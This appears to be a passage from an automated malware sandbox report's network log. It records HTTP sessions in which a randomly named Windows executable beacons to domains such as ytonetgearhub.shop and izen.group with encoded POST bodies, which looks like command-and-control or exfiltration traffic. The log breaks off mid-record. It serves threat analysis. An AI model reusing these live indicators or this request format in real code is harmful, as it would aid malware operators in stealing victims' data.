gIH08FrjlQ35VGG78su1rrh9CTg48l2oNpnL0IOudd6uyQxs58xJ/Nvi6Fc0fF3aGVY2DKeGDugy4333m1WM1GeEgINL0bunhqt91L8lvydHamUlOyDViU0JtWjor1uoY [TRUNCATED]
Aug 6, 2024 07:57:57.087496996 CEST	312	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 06 Aug 2024 05:56:52 GMT Content-Type: text/html Content-Length: 148 Connection: close ETag: "66a62378-94" Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.7	49726	154.23.184.207	80	6440	C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 6, 2024 07:57:58.722676039 CEST	532	OUT	GET /rjww/?K4G=Thy4J4VXH8ud&wLTtn0=21zhRHunkB6shXZDfVa1IsVwudiixK5d3l6Vv+2nLWpIaLBNoWu9aD0tgf5vArfoCL+2Np1WrTWVfntjgCU3jUG2yRIwUncgKO1dl+GE08PDbgeYNYZmHf3Eb1jWzI45ZCCGJ+uwj6f0 HTTP/1.1 Host: www.7ddw.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
Aug 6, 2024 07:57:59.609673977 CEST	312	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 06 Aug 2024 05:56:55 GMT Content-Type: text/html Content-Length: 148 Connection: close ETag: "66a62378-94" Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.7	49727	194.195.220.41	80	6440	C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 6, 2024 07:58:04.786267042 CEST	813	OUT	POST /l8y2/ HTTP/1.1 Host: www.ytonetgearhub.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Length: 219 Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: no-cache Origin: http://www.ytonetgearhub.shop Referer: http://www.ytonetgearhub.shop/l8y2/ User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 Data Raw: 77 4c 54 74 6e 30 3d 41 35 57 6b 6f 6f 67 4b 39 4e 44 32 4a 6e 75 46 68 4e 32 50 7a 52 32 78 79 49 59 35 4f 42 4b 30 2b 37 51 42 4f 52 45 35 6f 2f 6f 39 36 4c 30 6f 58 73 6c 47 6d 73 4f 43 50 59 69 6d 73 4e 4e 66 54 32 43 42 70 55 4a 64 77 41 54 50 64 39 36 52 6b 68 6e 65 74 69 7a 63 2f 4c 57 78 6b 48 51 36 78 72 4e 54 70 53 4e 49 34 71 4e 69 61 47 37 65 67 45 37 31 4b 79 70 72 6f 33 39 47 70 6e 65 55 2f 4b 50 6e 43 56 6e 43 71 67 72 4e 77 55 55 49 45 31 50 41 6e 50 59 4f 78 36 34 46 72 51 35 51 4f 37 7a 45 33 63 39 68 31 43 69 37 31 6a 45 73 39 52 6c 66 45 38 4c 49 49 57 66 4f 37 4c 7a 48 30 64 61 68 66 43 77 53 46 65 45 61 34 4b 30 71 64 41 3d 3d Data Ascii: wLTtn0=A5WkoogK9ND2JnuFhN2PzR2xyIY5OBK0+7QBORE5o/o96L0oXslGmsOCPYimsNNfT2CBpUJdwATPd96Rkhnetizc/LWxkHQ6xrNTpSNI4qNiaG7egE71Kypro39GpneU/KPnCVnCqgrNwUUIE1PAnPYOx64FrQ5QO7zE3c9h1Ci71jEs9RlfE8LIIWfO7LzH0dahfCwSFeEa4K0qdA==
Aug 6, 2024 07:58:05.283529997 CEST	873	IN	HTTP/1.1 200 OK Server: openresty/1.13.6.1 Date: Tue, 06 Aug 2024 05:58:05 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Content-Encoding: gzip Data Raw: 32 61 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 95 54 5d 73 a2 30 14 7d ef af 60 79 e8 ec ce ac a2 a0 55 b6 d0 9d d6 56 c4 52 6d b7 56 94 97 4e 48 52 13 1b 12 0a 41 a4 3b fb df 17 b1 a3 ee d8 97 cd 03 c9 3d dc 73 3f 4e 3e ac 2f d7 e3 de 64 7e 7f a3 10 19 b1 8b 13 6b 33 29 0c f0 85 ad 62 ae 5e 9c 28 e5 b0 08 06 68 bb ac cc 08 4b a0 40 02 92 14 4b 5b 7d 9a f4 6b dd 0f cf fd 6f 22 65 5c c3 6f 19 5d d9 ea ba 96 81 1a 14 51 0c 24 0d 19 56 15 28 b8 c4 bc e4 ba 37 36 46 0b 7c c4 e6 20 c2 b6 ba a2 38 8f 45 22 0f 08 39 45 92 d8 08 af 28 c4 b5 ca f8 ae 50 4e 25 05 ac 96 42 c0 b0 dd ac 37 0e c3 49 2a 19 be b0 b4 ed 5c b5 53 15 c9 45 0a 13 1a cb 7d 5b 9f d7 9e e0 97 04 a7 e4 a0 84 c6 79 96 30 7b d3 df 0f 4d cb f3 bc d3 a8 17 52 70 2c 17 18 24 24 0b eb 29 11 b1 a6 2a da 3e b4 a5 1d a7 b3 2a 15 0f 65 3a 4e d5 fe bf 54 96 b6 df 28 2b 14 a8 50 04 67 02 20 5b 45 e2 79 bb fc fa ed 50 9c ad 04 8a 2c e2 52 6d 89 d7 52 5b 82 15 d8 a2 07 7e 1b 65 5e 32 0e 25 15 5c 39 08 a5 fc de e9 b9 71 d9 8c 9c 72 24 f2 ba 14 71 9d 09 58 [TRUNCATED] Data Ascii: 2a9T]s0}`yUVRmVNHRA;=s?N>/d~k3)b^(hK@K[}ko"e\o]Q$V(76F\| 8E"9E(PN%B7I\SE}[y0{MRp,$$)>e:NT(+Pg [EyP,RmR[~e^2%\9qr$qXuR63X.byLOQd7;nFV93:S!NAHm\0zczI==oK%0Fl `C1Fr+ynu=3^pCC99s9t\7ofA 2\UHV8i$VYt~syz?#1zqQ=&H6&R\|i],;~`9o*\|qwpG`vw&#5z?+giZ8Zy0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.7	49728	194.195.220.41	80	6440	C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 6, 2024 07:58:07.323982954 CEST	833	OUT	POST /l8y2/ HTTP/1.1 Host: www.ytonetgearhub.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Length: 239 Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: no-cache Origin: http://www.ytonetgearhub.shop Referer: http://www.ytonetgearhub.shop/l8y2/ User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 Data Raw: 77 4c 54 74 6e 30 3d 41 35 57 6b 6f 6f 67 4b 39 4e 44 32 4b 47 65 46 79 61 61 50 79 78 32 2b 39 6f 59 35 41 68 4b 77 2b 37 4d 42 4f 56 31 38 6f 74 63 39 35 70 38 6f 46 76 39 47 72 4d 4f 43 62 49 69 70 7a 64 4d 52 54 32 47 4a 70 56 31 64 77 42 33 50 64 35 32 52 6b 57 7a 5a 74 79 7a 65 71 62 57 33 71 6e 51 36 78 72 4e 54 70 57 6c 75 34 70 39 69 62 33 4c 65 67 6c 37 79 44 53 70 6f 68 58 39 47 6a 48 65 51 2f 4b 50 56 43 51 2f 37 71 6d 6e 4e 77 52 6f 49 45 42 6a 44 70 2f 59 45 31 36 35 4f 6d 67 6f 6d 4d 65 50 74 2f 4b 78 59 39 56 54 66 77 56 5a 4f 6e 7a 70 7a 61 74 7a 7a 4d 55 37 34 73 74 75 79 32 63 65 35 53 67 45 7a 61 70 68 77 31 59 56 75 4c 30 70 44 53 72 44 6f 68 43 37 4f 35 38 50 35 43 52 6b 69 55 52 73 3d Data Ascii: wLTtn0=A5WkoogK9ND2KGeFyaaPyx2+9oY5AhKw+7MBOV18otc95p8oFv9GrMOCbIipzdMRT2GJpV1dwB3Pd52RkWzZtyzeqbW3qnQ6xrNTpWlu4p9ib3Legl7yDSpohX9GjHeQ/KPVCQ/7qmnNwRoIEBjDp/YE165OmgomMePt/KxY9VTfwVZOnzpzatzzMU74stuy2ce5SgEzaphw1YVuL0pDSrDohC7O58P5CRkiURs=
Aug 6, 2024 07:58:07.842675924 CEST	873	IN	HTTP/1.1 200 OK Server: openresty/1.13.6.1 Date: Tue, 06 Aug 2024 05:58:07 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Content-Encoding: gzip Data Raw: 32 61 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 95 54 cb 72 da 30 14 dd e7 2b 5c 2f 32 ed 4c c1 0f a0 e0 c6 4e 27 21 c1 31 71 20 69 08 06 6f 32 b2 a4 20 81 2c 39 b6 8c 71 3a fd f7 1a 93 09 74 e8 a6 5a 58 ba c7 f7 dc c7 d1 c3 fe 74 35 ee 4f e6 f7 d7 0a 91 31 3b 3f b1 b7 93 c2 00 5f 38 2a e6 ea f9 89 52 0d 9b 60 80 76 cb da 8c b1 04 0a 24 20 cd b0 74 d4 a7 c9 a0 d1 7b f7 dc ff 26 52 26 0d fc 9a d3 b5 a3 6e 1a 39 68 40 11 27 40 d2 88 61 55 81 82 4b cc 2b ae 77 ed 60 b4 c0 47 6c 0e 62 ec a8 6b 8a 8b 44 a4 f2 80 50 50 24 89 83 f0 9a 42 dc a8 8d af 0a e5 54 52 c0 1a 19 04 0c 3b 46 53 3f 0c 27 a9 64 f8 dc d6 76 73 dd 4e 5d 24 17 19 4c 69 22 f7 6d fd bb f6 14 bf a4 38 23 07 25 e8 67 79 ca 9c 6d 7f df 35 ad 28 8a ae de 2c a5 e0 58 2e 30 48 49 1e 35 33 22 12 4d 55 b4 7d 68 5b 3b 4e 67 d7 2a 1e ca 74 9c aa f3 7f a9 6c 6d bf 51 76 24 50 a9 08 ce 04 40 8e 8a c4 f3 6e f9 f9 cb a1 38 3b 09 14 59 26 95 da 12 6f a4 b6 04 6b b0 43 0f fc b6 ca bc e4 1c 4a 2a b8 72 10 4a f9 f5 a1 e7 d6 65 3b 0a ca 91 28 9a 52 24 4d 26 60 [TRUNCATED] Data Ascii: 2a9Tr0+\/2LN'!1q io2 ,9q:tZXt5O1;?_8R`v$ t{&R&n9h@'@aUK+w`GlbkDPP$BTR;FS?'dvsN]$Li"m8#%gym5(,X.0HI53"MU}h[;NgtlmQv$P@n8;Y&okCJ*rJe;(R$M&`7I(^zc82>yNctM2[^iu;zcTHg.2C+:76x_la};8[l(bL{kB-3=2;U</&YoV_zY!ssC6[FdntX"5~"2o@0"eZ((prU\|&!$Q0aL\|sPD1niuqQV=}aw$Ai;bi[:Z28\}p:wopFpvZ=-S+gkZ8Z\|0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.7	49729	194.195.220.41	80	6440	C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 6, 2024 07:58:09.879456043 CEST	1846	OUT	POST /l8y2/ HTTP/1.1 Host: www.ytonetgearhub.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Length: 1251 Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: no-cache Origin: http://www.ytonetgearhub.shop Referer: http://www.ytonetgearhub.shop/l8y2/ User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 Data Raw: 77 4c 54 74 6e 30 3d 41 35 57 6b 6f 6f 67 4b 39 4e 44 32 4b 47 65 46 79 61 61 50 79 78 32 2b 39 6f 59 35 41 68 4b 77 2b 37 4d 42 4f 56 31 38 6f 74 45 39 35 61 6b 6f 58 4f 39 47 6b 73 4f 43 48 34 69 35 7a 64 4d 63 54 32 2b 33 70 56 35 33 77 44 2f 50 63 63 71 52 69 69 66 5a 2b 53 7a 65 6f 62 57 32 6b 48 51 56 78 72 64 66 70 53 4a 75 34 70 39 69 62 31 44 65 69 30 37 79 42 53 70 72 6f 33 39 61 70 6e 65 30 2f 4b 58 76 43 51 7a 30 71 57 48 4e 77 78 59 49 43 69 62 44 72 66 59 4b 79 36 35 64 6d 67 6b 31 4d 61 6e 70 2f 4b 73 39 39 53 6e 66 78 43 63 30 79 69 77 76 50 75 2f 34 46 6e 58 56 37 2b 4f 34 34 50 6e 4f 61 67 70 58 58 62 56 4c 74 72 64 61 4a 67 77 76 47 4e 6a 70 76 69 44 32 33 72 32 62 52 52 67 6a 49 68 41 51 71 53 62 49 6d 79 71 6f 4e 75 6d 46 61 77 49 5a 73 42 56 74 4e 30 30 56 7a 6c 31 69 7a 78 61 33 68 44 2f 4c 37 43 72 2f 58 37 52 62 70 67 78 32 4b 67 4f 54 44 45 33 34 44 6d 36 6d 57 32 31 61 68 41 35 4b 66 55 33 7a 50 6a 52 58 61 49 34 64 46 77 76 6f 6d 56 65 4f 70 38 62 4d 34 41 6b 64 35 4c 77 [TRUNCATED] Data Ascii: wLTtn0=A5WkoogK9ND2KGeFyaaPyx2+9oY5AhKw+7MBOV18otE95akoXO9GksOCH4i5zdMcT2+3pV53wD/PccqRiifZ+SzeobW2kHQVxrdfpSJu4p9ib1Dei07yBSpro39apne0/KXvCQz0qWHNwxYICibDrfYKy65dmgk1Manp/Ks99SnfxCc0yiwvPu/4FnXV7+O44PnOagpXXbVLtrdaJgwvGNjpviD23r2bRRgjIhAQqSbImyqoNumFawIZsBVtN00Vzl1izxa3hD/L7Cr/X7Rbpgx2KgOTDE34Dm6mW21ahA5KfU3zPjRXaI4dFwvomVeOp8bM4Akd5LwnDFHJGJuTujM8fsAsx7mfhww7yQtHf6Vy665X2ocUJ202jnd+RJLu8APLnB+T0dtNuCuFdJSlL8UhuW/a+Xn6gXhgCudyBmWJUk1fH8AHdhgNgPzJbQOwZJEfMoyfpWG+kPlZxcf81XHcOYPqC43Rvl74OUll4b1LzkqWANj6yscQgLM79t6tOPFYG9FSJW7HSxQm9sPdodEyivYj+a45hHoBmNH45/pvXoB43AOhE+f2pyev71MLN5Xb17wBigP2R0twRe/HvugnzYZSswTJxNtU6ZxOK9kffPQtDbl6vuOyqn4Itw5g93vsaaPR926Xc/DGZlCblsCzLM3YoAcrBH+3YylzytMtS2umSzMm5mDEzOGcq8nuDOMEfvnE/1VNRh8ZQSCCNpkZQpZ2e+4//HEQOhQYVasl+mrB1eGBE4WyZeoBm3MEknlNkOCohXyD8+bXb3k3Fiv7BaJin5OYalbEusX75TDQT1bSqhvJCcOQzE1vnbYUPhmuhvqzJl9eTJMjgM511OSDDA23QgmWIx2O6AiqRr3ZqoVr4+73qz3wzxpF5E3kjnJf6GQlkSyra0AiX0omU3W2rckXRDrwZS592JfbTgI+xuBvkN13w2X8HUhTCZNUgEuraO1qcnwoVGDVZm3w8Jnk0Bd8Ta5qImH+LDFkMZabC [TRUNCATED]
Aug 6, 2024 07:58:10.399318933 CEST	872	IN	HTTP/1.1 200 OK Server: openresty/1.13.6.1 Date: Tue, 06 Aug 2024 05:58:10 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Content-Encoding: gzip Data Raw: 32 61 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 95 54 5d 73 a2 30 14 7d ef af 60 79 e8 ec ce ac 22 a8 ab 6c a1 3b ad 55 c4 52 6d b7 56 94 97 4e 48 52 13 0d 09 85 20 d2 9d fd ef 8b d8 a9 ee b8 2f 9b 07 92 7b b8 e7 7e 9c 7c 58 9f 6e 26 bd e9 e2 be af 10 19 b1 cb 33 6b 37 29 0c f0 a5 ad 62 ae 5e 9e 29 e5 b0 08 06 68 bf ac cc 08 4b a0 40 02 92 14 4b 5b 7d 9a 0e 6a dd 77 cf c3 6f 22 65 5c c3 af 19 dd d8 ea b6 96 81 1a 14 51 0c 24 0d 19 56 15 28 b8 c4 bc e4 ba 7d 1b a3 25 3e 61 73 10 61 5b dd 50 9c c7 22 91 47 84 9c 22 49 6c 84 37 14 e2 5a 65 7c 55 28 a7 92 02 56 4b 21 60 d8 d6 eb 8d e3 70 92 4a 86 2f 2d 6d 3f 57 ed 54 45 72 91 c2 84 c6 f2 d0 d6 bf 6b 4f f0 4b 82 53 72 54 42 e3 22 4b 98 bd eb ef bb a6 e5 79 de 69 d4 0b 29 38 96 4b 0c 12 92 85 f5 94 88 58 53 15 ed 10 da d2 4e d3 59 95 8a c7 32 9d a6 6a ff 5f 2a 4b 3b 6c 94 15 0a 54 28 82 33 01 90 ad 22 f1 bc 5f 7e fe 72 2c ce 5e 02 45 16 71 a9 b6 c4 5b a9 ad c0 06 ec d1 23 bf 9d 32 2f 19 87 92 0a ae 1c 85 52 7e 7d e8 b9 73 d9 8d 9c 72 24 f2 ba 14 71 9d 09 58 [TRUNCATED] Data Ascii: 2a8T]s0}`y"l;URmVNHR /{~\|Xn&3k7)b^)hK@K[}jwo"e\Q$V(}%>asa[P"G"Il7Ze\|U(VK!`pJ/-m?WTErkOKSrTB"Kyi)8KXSNY2j_K;lT(3"_~r,^Eq[#2/R~}sr$qXuR6z_naX~JOQd0flNhn$8y2q1azE=#oK]G7a4AF&jz5BXw3hd.MKYcU.Zgrl1h&&aoK: mBjB?i#VI`<m 6frar#<`zKfZ9qPtXmLqoKg+w%f}K`5W17MCk82NNhh30

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.7	49730	194.195.220.41	80	6440	C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 6, 2024 07:58:12.417963982 CEST	542	OUT	GET /l8y2/?wLTtn0=N7+ErdMNi9jLXETIvOCQ72nB9fpjFBOAyZNeO0Rg3M8w3pAJDP1ag+bhPLbHl+sxFhu1gT5MnEPxV82xgAHVuybS9IiKiGQkxKNSomt8mrNqSTPrwHmQNW0cpyJUmmeq46PNHGSVyG+Q&K4G=Thy4J4VXH8ud HTTP/1.1 Host: www.ytonetgearhub.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
Aug 6, 2024 07:58:12.929941893 CEST	1236	IN	HTTP/1.1 200 OK Server: openresty/1.13.6.1 Date: Tue, 06 Aug 2024 05:58:12 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Data Raw: 35 33 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6e 6f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 37 30 2e 79 74 6f 6e 65 74 67 [TRUNCATED] Data Ascii: 535<!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="x-ua-compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title></title> <noscript> <meta http-equiv="refresh" content="0;url=http://www70.ytonetgearhub.shop/" /> </noscript> <meta http-equiv="refresh" content="5;url=http://www70.ytonetgearhub.shop/" /> </head> <body onload="do_onload()"> <script type="text/javascript"> function do_onload() { window.top.location.href = "http://www.ytonetgearhub.shop/l8y2?gp=1&js=1&uuid=1722923892.9737034374&other_args=eyJ1cmkiOiAiL2w4eTIiLCAiYXJncyI6ICJ3TFR0bjA9TjcrRXJkTU5pOWpMWEVUSXZPQ1E3Mm5COWZwakZCT0F5Wk5lTzBSZzNNOHczcEFKRFAxYWcrYmhQTGJIbCtzeEZodTFnVDVNbkVQeFY4MnhnQUhWdXliUzlJaUtpR1FreEtOU29tdDhtck5xU1RQcndIbVFOVzBjcHlKVW1tZXE0NlBOSEdTVnlHK1EmSzRHPVRoeTRKNFZYSDh1ZCIsICJyZWZlcmVyIjogIiIsICJhY2NlcHQiOiAidGV4dC9odG1s [TRUNCATED]
Aug 6, 2024 07:58:12.930077076 CEST	265	IN	Data Raw: 59 58 5a 70 5a 69 78 70 62 57 46 6e 5a 53 39 33 5a 57 4a 77 4c 47 6c 74 59 57 64 6c 4c 32 46 77 62 6d 63 73 4b 69 38 71 4f 33 45 39 4d 43 34 34 4c 47 46 77 63 47 78 70 59 32 46 30 61 57 39 75 4c 33 4e 70 5a 32 35 6c 5a 43 31 6c 65 47 4e 6f 59 57 Data Ascii: YXZpZixpbWFnZS93ZWJwLGltYWdlL2FwbmcsKi8qO3E9MC44LGFwcGxpY2F0aW9uL3NpZ25lZC1leGNoYW5nZTt2PWIzO3E9MC43IiwgInVyaV9jIjogIjY2NDkiLCAiYXJnc19jIjogIjQ3N2MiLCAicmVmZXJlcl9jIjogImUyMGIiLCAiYWNjZXB0X2MiOiAiNGQ4NSJ9"; } </script>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.7	49731	13.248.169.48	80	6440	C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 6, 2024 07:58:18.127945900 CEST	789	OUT	POST /b7sv/ HTTP/1.1 Host: www.izen.group Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Length: 219 Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: no-cache Origin: http://www.izen.group Referer: http://www.izen.group/b7sv/ User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 Data Raw: 77 4c 54 74 6e 30 3d 39 35 4c 65 6a 32 6b 31 79 47 59 65 69 52 55 47 47 61 44 5a 4b 72 65 32 4d 6c 52 72 68 72 51 76 41 4f 31 7a 7a 49 42 75 4a 51 44 4a 6d 74 55 49 41 31 66 4f 72 4f 47 70 54 46 4b 79 31 74 71 6d 32 2b 2f 72 72 59 54 4a 44 4f 47 4c 79 4e 75 66 37 49 7a 36 48 69 42 34 46 47 35 47 56 65 38 52 36 34 61 71 4b 50 42 5a 56 4c 57 33 69 57 4c 6b 76 6e 6c 48 51 6a 34 54 6f 59 6a 50 62 68 51 64 34 63 6d 79 66 74 6c 66 46 56 48 4d 45 79 47 34 71 49 69 30 79 54 63 76 63 58 77 69 69 54 6e 6c 39 45 4c 76 39 31 65 70 52 44 68 30 6c 75 44 36 4f 6d 42 37 45 74 45 51 6b 4e 79 4d 30 43 58 77 34 2b 49 65 71 4b 58 58 4d 4c 59 72 2f 6f 36 42 37 67 3d 3d Data Ascii: wLTtn0=95Lej2k1yGYeiRUGGaDZKre2MlRrhrQvAO1zzIBuJQDJmtUIA1fOrOGpTFKy1tqm2+/rrYTJDOGLyNuf7Iz6HiB4FG5GVe8R64aqKPBZVLW3iWLkvnlHQj4ToYjPbhQd4cmyftlfFVHMEyG4qIi0yTcvcXwiiTnl9ELv91epRDh0luD6OmB7EtEQkNyM0CXw4+IeqKXXMLYr/o6B7g==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.7	49732	13.248.169.48	80	6440	C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 6, 2024 07:58:20.675697088 CEST	809	OUT	POST /b7sv/ HTTP/1.1 Host: www.izen.group Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Length: 239 Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: no-cache Origin: http://www.izen.group Referer: http://www.izen.group/b7sv/ User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 Data Raw: 77 4c 54 74 6e 30 3d 39 35 4c 65 6a 32 6b 31 79 47 59 65 69 79 4d 47 56 70 62 5a 43 72 65 31 44 46 52 72 32 37 52 6d 41 50 4a 7a 7a 4b 74 2b 49 6c 62 4a 6d 50 63 49 42 33 6e 4f 2b 4f 47 70 62 6c 4b 7a 6f 39 71 54 32 2b 7a 5a 72 5a 76 4a 44 4b 6d 4c 79 4a 71 66 37 37 72 31 56 69 42 36 4b 6d 35 49 66 2b 38 52 36 34 61 71 4b 50 55 32 56 4c 65 33 6a 6a 44 6b 2b 7a 4a 47 4c 44 34 63 2f 6f 6a 50 66 68 51 5a 34 63 6d 51 66 74 55 58 46 54 44 4d 45 33 36 34 71 64 43 37 34 54 63 6c 44 48 78 72 75 52 4b 43 35 33 79 51 31 58 76 6f 59 7a 5a 32 6b 59 65 59 55 45 4e 58 61 38 38 72 67 50 57 36 6a 6b 4b 46 36 2f 4d 47 6e 6f 6a 32 54 38 39 42 79 36 62 46 74 65 46 75 75 53 48 47 50 36 31 43 56 63 6e 4e 2f 48 6d 44 5a 4e 51 3d Data Ascii: 